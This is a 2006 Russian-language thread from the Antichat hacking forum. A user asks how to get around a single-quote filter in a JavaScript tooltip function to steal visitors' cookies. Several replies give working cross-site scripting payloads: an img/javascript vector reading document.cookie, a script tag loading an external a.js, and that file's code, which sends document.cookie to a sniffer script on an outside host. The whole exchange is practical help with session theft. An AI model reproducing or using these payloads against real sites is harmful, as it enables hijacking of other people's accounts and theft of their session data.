Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Проблема в JavaScripts... Возможно ли такое? |

05.01.2006, 01:53
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме: 106810
Репутация:
10
|
|
Проблема в JavaScripts... Возможно ли такое?
Есть такая функция вывода текста:
function show(text) {
var s;
s='<FONT STYLE="FONT-SIZE: 8pt;">'+text+'</FONT>';
hint1.innerHTML=s;
SetPosition();
hint1.style.visibility='visible';
}
Она выводит на экран текст таким образом
onmouseover="show('ТЕКСТ');"
Помогите пожалуйста, можно ли вставить в show('СЮДА') еще одну ява функцию (например: alert(document.cookie)  если не розрешается использовать символ " ' " (одинарной кавычки), он заменяется на Также розрешается использовать любые символы вида " , & , < и т.к.
P.S. Если допускалось использование одинарной кавчки, я бы сделал так
onmouseover="show('ТЕКСТ');alert(document.coo kie);('');", т.е. просто бы вставил ');alert(document.cookie);('
Но увы так нельзя... поэтому пришлось обращаться к вам за помощью 
|
|
|

05.01.2006, 02:40
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме: 106810
Репутация:
10
|
|
Уже нашел одно из решений, но всерано не могу добиться главного:
Вот такое проходит: </script><img src=javascript :alert(document.cookie);><script>
Но мне нужно чтобы кукисы не выводились а отправлялись на сниффер. Написал вот так вот:
</script><img src=javascript :document.images[0].src=http://adress/sniff.php?+document.cookie;><script>
Но выводит синтаскичискую ошибку... помогите розобраться, напомнаю использовать " ' " (одинарную кавычку) нельзя 
|
|
|

05.01.2006, 23:34
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме: 106810
Репутация:
10
|
|
хана.. что за форум.. одно молчание 
|
|
|

05.01.2006, 23:47
|
|
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме: 993362
Репутация:
175
|
|
src="http://adress/sniff.php?"+document.cookie;>
так попробуй. Двойные ковычки то использывать можно?
|
|
|

05.01.2006, 23:58
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме: 2050916
Репутация:
0
|
|
Масса способов.
Например
</script><img src=javascript :document.images[0].src="http://adress/sniff.php?+document.cookie;"><script>
А вообще см. http://antichat.ru/crackchat/HTML/
Там все есть.
|
|
|

06.01.2006, 00:01
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме: 106810
Репутация:
10
|
|
думаю двойные кавчки здесь не выход.. т.к. елси поставить двойную кавычку, то она закроет onmouseover=" вот эту.. но этого делать нельзя(
|
|
|

06.01.2006, 00:23
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме: 106810
Репутация:
10
|
|
|
|
|

06.01.2006, 00:27
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме: 2050916
Репутация:
0
|
|
</script><script src=http://blablabla.ru/a.js></script>
|
|
|

06.01.2006, 00:33
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме: 106810
Репутация:
10
|
|
Если можешь, напиши содержимое .js файла.. а то я плохо в яве розбираюсь, но то что ты предложил понял, и мне это видимо подходит...
|
|
|

06.01.2006, 00:40
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме: 2050916
Репутация:
0
|
|
a.js :
Код:
i = new Image();
i.src="http://mysite.ru/sniff.pl?"+document.cookie;
Последний раз редактировалось Algol; 06.01.2006 в 00:42..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|